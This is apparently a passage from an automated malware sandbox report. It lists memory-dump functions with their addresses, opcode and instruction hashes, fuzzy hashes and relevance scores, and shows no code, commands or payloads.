                                                                                    • Opcode Fuzzy Hash: 0fccfe9ce844901ad0c9bc66d33be36ba9927e1d4a61a65dd69f81ee09d54a5b
                                                                                    • Instruction Fuzzy Hash: 9221F275604204DFDB18CF60F984B16BBA5FB88B14F24C9A9E8494B346C336D847CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0013E674, Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404380911.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c24aba548d23e8ec98c32d49a2a053aeaa8926af7a48f3c5599024fc60fcdaa4
                                                                                    • Instruction ID: 5ef8cea63552cef73d2a1819bdc5b6f7434c58812657d1807f9d5e79a9d48def
                                                                                    • Opcode Fuzzy Hash: c24aba548d23e8ec98c32d49a2a053aeaa8926af7a48f3c5599024fc60fcdaa4
                                                                                    • Instruction Fuzzy Hash: 9621D7B5604344DFDB04CF60D5C4B16BBE5FB98714F24C969D8494B382C736E856CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0013D006, Relevance: .1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404380911.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
                                                                                    • Instruction ID: 4698269574757a894325b314b47f151c30b48a5e4acc66bdc8d2addee85b8ffa
                                                                                    • Opcode Fuzzy Hash: 0d4d1891c80aa91e5cd20667cb2685b9e4d0f21e3291cfd548351f9581df3e52
                                                                                    • Instruction Fuzzy Hash: 0C2141755083809FCB06CF14E994715BFB1EB46714F24C5DAD8498F256C33AD856CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D487, Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                    • Instruction ID: c5ff1bf99ad9758d007037043650640b1e31824eb95eb1686963ab4eb24baf42
                                                                                    • Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                    • Instruction Fuzzy Hash: 4911D376504280CFCB02CF10E5C4B16BF72FB94314F24C6A9D8094B256C37AD866CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D573, Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                    • Instruction ID: 54ba13d556085afd9530cc980f22d6d0fa66daf6bebc92b98b56526fb8f40226
                                                                                    • Opcode Fuzzy Hash: 6286a3279e69299413871d4e25d69dc89c120fe7ccd7aa2d64d44a89ce99abad
                                                                                    • Instruction Fuzzy Hash: 6711E676504280CFCF12CF10E5C4B16BF71FB95314F24C5A9D8090B616C336D866CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0013E66F, Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404380911.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
                                                                                    • Instruction ID: 6c84480d853a7de5ed729448cc591acfdf0c6b1d56beecc1c891c0bf05b13212
                                                                                    • Opcode Fuzzy Hash: ea8ce52f3b615b8e449be01d93b9393bbd7ecd0d493f38c7c44483db944f7c15
                                                                                    • Instruction Fuzzy Hash: 56119D79504380DFCB05CF10D5C4B15BFA2FB85314F28C6A9D8494B696C33AE85ACFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D795, Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a80e5b3fd66f9b76af4a7fc539d1cb0f763f5283fd0135bc1123ee7887bf593
                                                                                    • Instruction ID: c9627abd5a5de3c7dc54c89b237c930e00e35351a3b8d1204c18d6f8af0e3e32
                                                                                    • Opcode Fuzzy Hash: 0a80e5b3fd66f9b76af4a7fc539d1cb0f763f5283fd0135bc1123ee7887bf593
                                                                                    • Instruction Fuzzy Hash: 7401A731404354DBD7208F55E988BA7BBDCEF51728F24885AED491A282C37D9850C7B1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0012D794, Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404365106.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 19653cbb151c9c7ac01a03c5c76a71a83d48349e3352f5aa0cdeffb115a6001e
                                                                                    • Instruction ID: 0505afd51c1c31f008b7823f324ee6148e7f18f06bf9273b8a8b4af6f789de04
                                                                                    • Opcode Fuzzy Hash: 19653cbb151c9c7ac01a03c5c76a71a83d48349e3352f5aa0cdeffb115a6001e
                                                                                    • Instruction Fuzzy Hash: 81F062714046549FE7208E15E888B62FFD8EB91724F28C55AED485B286C3799C44CBB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00404208, Relevance: .3, Instructions: 336COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2404465078.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000007.00000002.2404462321.0000000000400000.00000040.00000001.sdmp Download File
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77c4be4ae6bd9649bc7396ea4b2f6a21676d11070a655a7510003ee973814904
                                                                                    • Instruction ID: 1f27e055348b1160dfcadc7b5337b4be5b2f0784eb200be0db3f906d3341f116
                                                                                    • Opcode Fuzzy Hash: 77c4be4ae6bd9649bc7396ea4b2f6a21676d11070a655a7510003ee973814904
                                                                                    • Instruction Fuzzy Hash: F6E1058144E7D61ECB13DBB5183AB96BF316E63214F5E95DFC0C29B093F6212829C366
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%